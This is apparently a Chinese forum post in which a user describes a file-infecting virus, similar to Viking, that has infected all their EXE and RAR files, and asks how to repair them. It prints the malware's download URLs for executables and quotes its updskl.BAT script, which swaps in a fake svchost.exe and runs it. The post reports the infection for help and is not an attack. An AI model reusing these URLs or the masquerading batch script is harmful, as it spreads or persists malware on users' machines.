今天装软件遇到的问题,相信在不久会有很多的人来问这个问题。
很多exe文件都不能用了,都中毒了
却发现运行不了。。。估计有问题,所以用OD快速跑了一遍,原来是被感染了
发现所有的EXE也都被感染了,跟上次中的威金一样,上次损失惨重,这次又有得哭了
问题补充:可以确定病毒的动作是下载http://gm3.testkl.cn/kl.exe到C:\Program Files\Common Files\System\svchost.exe并执行!那怎么修复被感染的文件呢?
====================================================================================================================
1:临时文件夹发现
http://gm3.tesk1.cn/1.exe
http://gm3.tesk1.cn/2.exe
http://gm3.tesk1.cn/3.exe
2:C:\Program Files\Common Files\System目录下发现:
D1.EXE
D2.EXE
D3.EXE
3:发现一个updskl.BAT文件,居然出现在F盘下
@echo off
:loop
del "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\ver.txt"
del "C:\Program Files\Common Files\System\she.dll"
if exist "C:\Program Files\Common Files\System\svchost.exe" goto loop
C:
cd C:\Program Files\Common Files\System\
ren svchostnew.exe svchost.exe
call "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\updskl.bat"
这种病毒可感染exe,rar,一旦运行被感染的exe文件就会增加2个C:\Program Files\Common Files\System\svchost.exe进程,而且360不能查到这个进程,并且也会被感染,冰刃可以查到这个进程,但同样被感染,求修复的方法.....
问题补充,现在发现rar文件同样被感染
